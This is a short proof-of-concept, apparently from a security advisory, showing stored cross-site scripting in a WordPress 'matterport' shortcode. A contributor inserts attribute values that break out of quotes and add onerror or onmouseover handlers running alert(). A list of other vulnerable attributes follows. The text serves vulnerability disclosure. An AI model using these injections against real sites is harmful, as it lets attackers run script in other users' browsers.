As a contributor, put the following shortcodes in the page/post and view/preview it

[matterport src="test" width='1 " onerror="alert(/XSS1/)']
[matterport src="test" window='"onmouseover=alert(/XSS2/)//'] (and move the mouse over the generated block to trigger the XSS)

Other affected attributes: height, help, hl, qs, brand, lang, hhl, kb, lp, title, tourcta, maxzoom, minzoom, zoomtrans, mpv, filter, minimapfilter, copyright, ga, aa